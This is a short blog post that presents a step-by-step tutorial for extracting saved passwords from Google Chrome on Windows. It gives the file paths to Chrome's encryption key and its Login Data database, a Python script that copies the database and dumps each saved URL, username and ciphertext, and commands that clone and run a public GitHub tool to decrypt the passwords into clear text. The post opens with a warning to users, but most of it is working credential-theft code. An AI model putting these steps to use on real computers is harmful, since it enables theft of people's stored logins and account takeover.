Open in app

Sign in

Write

Sign in

Home

Following

Library

Stories

Stats

Hacking Saved Passwords in Google Chrome

Luís Felipe
3 min readAug 11, 2023

If you have the habit of saving your passwords in the browser, you are at great risk of having these passwords discovered by hackers.

I will show you how hackers find the passwords that are saved in your browser, but first, let’s understand a little bit about how they are stored on your computer.

We will break it down into 4 parts to manually collect the passwords, and in the end, I will explain how to do it automatically with a script.

1. Locating the encryption key

The key is stored in a JSON file and can be found in the Google User Data folder.

notepad C:\Users\<SEU PC>\AppData\Local\Google\Chrome\User Data\Local State

Open the file with a text editor (e.g., Notepad) at the following location: C:\Users<YOUR PC>\AppData\Local\Google\Chrome\User Data\Local State Search for “encrypted_key” in the file, and you will find the key. Save it.

2. Locating the encrypted passwords

The encrypted password is stored in an SQLite database, which can be found in the Default folder of Google Chrome:

C:\Users\<SEU PC>\AppData\Local\Google\Chrome\User Data\Default\Login Data

To access this data, we will use Python 3 to extract the information:

import shutil
import sqlite3
import os

# Chrome username & password file path
chrome_path_login_db = "C:\\Users\\**<SEU PC>**\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

# Copy Chrome login data to current directory
shutil.copy2(chrome_path_login_db, "Loginvault.db")

# Connect to sqlite database
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()

# Select statement to retrieve info
cursor.execute("SELECT action_url, username_value, password_value FROM logins")

for index, login in enumerate(cursor.fetchall()):
    url = login[0]
    username = login[1]
    ciphertext = login[2]
    print("Url:", url)
    print("Username:", username)
    print("Cipher Text:", ciphertext)

# Close the cursor and connection
cursor.close()
conn.close()

# Clean up by removing copied database file
os.remove("Loginvault.db")

You will get output like this:

The output will contain the Url of the specific website where the password is saved, Username which usually contains the user’s email that is saved and Cipher Text which contains the cipher text with AES symmetric key encryption.

3. Decrypting saved passwords

By understanding that AES encryption is a symmetric key encryption, we can use the encrypted key we obtained to decrypt the passwords. For this we will use public code from GitHub.

git clone https://github.com/ohyicong/decrypt-chrome-passwords/tree/main
cd decrypt-chrome-passwords
python decrypt_chrome_password.py

This way you will get clean output with the URL, Username and password in clear text.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Technology
Luís Felipe
Luís Felipe

Written by Luís Felipe

6 Followers
3 Following

Cybersecurity Research

Responses (1)

Write a response

What are your thoughts?

Hirepef

Mar 6

Adapapt the git url to https://github.com/ohyicong/decrypt-chrome-passwords.git

More from Luís Felipe

See all from Luís Felipe

Recommended from Medium

See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech